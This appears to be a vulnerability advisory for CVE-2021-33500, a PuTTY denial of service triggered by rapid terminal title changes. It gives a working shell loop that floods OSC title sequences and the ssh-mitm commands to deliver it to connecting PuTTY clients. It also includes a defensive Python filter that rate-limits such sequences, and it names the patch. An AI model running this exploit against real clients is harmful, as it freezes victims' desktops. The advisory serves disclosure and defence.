CVE-2021-33500
7.5 CVSS
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H https://nvd.nist.gov/vuln/detail/CVE-2021-33500

integrated in SSH-MITM plugins

PuTTY before 0.75 on Windows allows remote servers to cause a denial of service (Windows GUI hang) by telling the PuTTY window to change its title repeatedly at high speed, which results in many SetWindowTextA or SetWindowTextW calls.

NOTE: the same attack methodology may affect some OS-level GUIs on Linux or other platforms for similar reasons.

Affected Software:
  • PuTTY < 0.75

Description

A vulnerability in PuTTY < 0.75 freezes the entire desktop, leading inevitably to a manual restart. This happens when a simple command is executed that repeatedly changes the terminal's title.

Set window title from terminal:

$ PS1=''
echo -ne "\033]0; NEW_TITLE \007"

Thus, a working exploit would be:

$ PS1=''
while :
> do
> echo -ne "\033]0; NEW_TITLE${RANDOM}  \007"
> done

Using the injection functionality of the SSH-MITM server, this exploit can be executed immediately when a client connects to it via PuTTY.
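The sequence the loop above emits is an xterm OSC title command (ESC ] 0 ; text BEL, or the ST terminator ESC \ instead of BEL). From the defender's side, a terminal proxy or session logger sitting between the SSH channel and the GUI can recognise these sequences and cap how many reach the window per second, so a flooding server cannot drive SetWindowText calls at high speed. The filter below is an added example written for this page; it is not part of the SSH-MITM project or of PuTTY, and the regex, the TitleRateLimiter class and the sample stream are constructed for illustration.

```python
"""Rate-limit OSC window-title sequences in terminal output.

Added example (not SSH-MITM or PuTTY code): a stream filter that a
client-side terminal proxy or logger could apply. The regex, class and
sample data are constructed for illustration.
"""
import re
from collections import deque

# xterm OSC 0 (icon name + title), OSC 1 (icon name) and OSC 2 (title),
# terminated either by BEL (0x07) or by ST (ESC \).
OSC_TITLE_RE = re.compile(rb"\x1b\][012];[^\x07\x1b]*(?:\x07|\x1b\\)")


def find_title_changes(data: bytes) -> list:
    """Return every title-change sequence found in a chunk of terminal output."""
    return [m.group(0) for m in OSC_TITLE_RE.finditer(data)]


class TitleRateLimiter:
    """Pass through at most `max_per_window` title changes per `window_s` seconds.

    Excess title sequences are removed from the stream; all other output is
    kept byte-for-byte, so the session stays usable while the flood is absorbed.
    """

    def __init__(self, max_per_window: int = 5, window_s: float = 1.0) -> None:
        self.max_per_window = max_per_window
        self.window_s = window_s
        self._times = deque()  # arrival times of title changes passed through
        self.dropped = 0       # number of title changes removed so far

    def filter(self, data: bytes, now: float) -> bytes:
        """Filter one chunk; `now` is the chunk's arrival time in seconds."""
        out = bytearray()
        pos = 0
        for m in OSC_TITLE_RE.finditer(data):
            out += data[pos:m.start()]
            pos = m.end()
            # Forget title changes that have fallen out of the sliding window.
            while self._times and now - self._times[0] >= self.window_s:
                self._times.popleft()
            if len(self._times) < self.max_per_window:
                self._times.append(now)
                out += m.group(0)
            else:
                self.dropped += 1
        out += data[pos:]
        return bytes(out)


# Constructed sample: one benign prompt-driven title update, then a burst of
# 20 title changes arriving in the same instant, as the loop in the advisory
# would produce.
BENIGN = b"\x1b]0;user@host:~\x07$ ls\r\n"
FLOOD = b"".join(b"\x1b]0; NEW_TITLE%d  \x07" % i for i in range(20))


def demo() -> tuple:
    """Run the limiter over the samples; returns (flood count, dropped, benign output)."""
    limiter = TitleRateLimiter(max_per_window=5, window_s=1.0)
    kept_benign = limiter.filter(BENIGN, now=0.0)
    limiter.filter(FLOOD, now=0.5)
    return len(find_title_changes(FLOOD)), limiter.dropped, kept_benign


if __name__ == "__main__":
    total, dropped, benign = demo()
    print(f"title changes in flood: {total}, dropped by limiter: {dropped}")
    print(f"benign output unchanged: {benign == BENIGN}")
```

With a budget of five title changes per second, the benign update at t=0 and the first four flood updates at t=0.5 pass, and the remaining sixteen are dropped while the rest of the stream is untouched. The arrival time is passed in explicitly rather than read from the clock so the behaviour is deterministic and testable.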

Test with SSH-MITM

A proof-of-concept exploit is integrated in the extra package ssh-mitm-plugins.

You can install the required extra packages with the following command:

$ pip install ssh-mitm[plugins]

After installing the plugins you can start ssh-mitm:

$ ssh-mitm --ssh-interface puttydos

Once you have logged in with PuTTY to the ssh-mitm server, ssh-mitm executes the exploit and PuTTY will freeze the desktop.

Mitigation

Update PuTTY to version >= 0.75